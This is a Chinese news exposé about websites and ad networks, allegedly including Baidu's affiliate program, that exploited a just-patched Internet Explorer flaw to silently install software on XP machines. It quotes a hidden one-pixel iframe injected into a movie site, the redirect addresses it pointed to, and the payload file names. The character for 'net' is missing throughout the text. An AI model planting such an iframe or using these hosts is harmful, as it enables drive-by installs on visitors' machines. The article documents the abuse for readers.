漏洞是黑客们的“蜜罐” 有无良 站和企业竟利用漏洞推广软件

漏洞是软件、系统和 站的软肋，有漏洞就会有攻击，就会有漏洞利用，黑客挖掘漏洞有的是为了炫技，也有的是为了安全防护，更多的还是为了攻击和牟利。

利用漏洞在 站挂马这种方式已经消停了有一段时间，但最近又开始流行了，一些无良 站利用这种方式推广软件牟利，这可是赤裸裸的病毒行为呀。

漏洞是木马病毒入侵的一个主要通道，黑客利用漏洞在 站挂马，一旦有人访问电脑就会自动下载运行病毒。但令人震惊的是，竟有杀毒软件也在利用漏洞偷偷自动装入用户电脑。

据专业安全论坛卡饭 友曝光称，自己用XP电脑访问百度影音联盟 站时，电脑自动下载运行了百度杀毒、百度卫士、百度浏览器和百度输入法等一系列百度软件。经过分析，发现这是名为“百度有钱联盟”的安装包在利用IE漏洞植入电脑。

名为“雷帝因陀罗” 友表示，今天上 看片，搜到一个影音站，结果片子半天没有缓冲出来，电脑先卡得要死。没过一会儿，突然发现桌面右下角冒出几个图标，不知怎么就装上了百度杀毒、百度卫士之类的。

他第一反应就是这个 站有问题，赶紧查了下页面的源代码“
www.80ydw.com/movie/693.html”，果然有处很可疑：<iframe src=http://hpa.pw/HHH width=1 height=1></iframe>，明显是被挂马了：

他进一步分析，“hpa.pw/HHH”这个页面会跳转到“
221.233.160.110/images/xml.html”，懂行的一看都知道了，它就是利用微软11月刚补的IE漏洞挂马（该 友电脑是XP系统直接中招），挂的竟然是一个百度官方签名的安装包，下载地址也是在百度服务器！

再看百度利用IE漏洞偷偷安装的这个安装包，文件名是
BaiduYouQianPartPackSilent_1.1.0.10_150946.exe，大小竟然有144MB！当它利用漏洞自动下载执行后，会给电脑里装上百度杀毒、百度卫士、百度浏览器和百度输入法等一系列软件，难怪电脑都快卡死机了。

百度推广使用的漏洞，在11月微软补丁日刚刚得到微软修复。但由于部分 民没有及时打补丁，再加上XP系统停止安全更新，此漏洞仍存在一定风险。

正如 友“雷帝因陀罗”所说，互联 公司流氓推广见得多了，但最多就是诱导性的弹窗，而百度所谓的杀毒软件，竟然像病毒一样攻击用户的系统漏洞，真是连底裤都不要了。

在看到“雷帝因陀罗”在卡饭论坛上的帖子之后，笔者在一台XP电脑上也进行了验证，浏览器打开“
www.80ydw.com/movie/693.html”这个 页，什么也不干，大约6分钟后，桌面上出现了百度杀毒、百度卫士、百度浏览器、百度输入法四个图标，这4款软件被安装在我的电脑中。

除了百度之外，在乌云 站也揭露了2529 盟利用最新ie漏洞强制安装光芒微端，白帽子whale在乌云上 告：我在用百度浏览器的ie兼容模式浏览 “www.dy2018.com” 这个电影 站时，发现莫名其妙运行了一个叫“光芒微端”的游戏客户端，然后我就用smartsniff抓包分析，在查看源代码时发现了2529 盟的js广告代码，里面就是最新公布的18年陈酿的ie漏洞！引用这个js就会从它的ftp上下载kuaidu_2_23_01.exe并运行！

百度的这次利用了与2529 盟一样的IE漏洞和利用方式，推广手段也一样。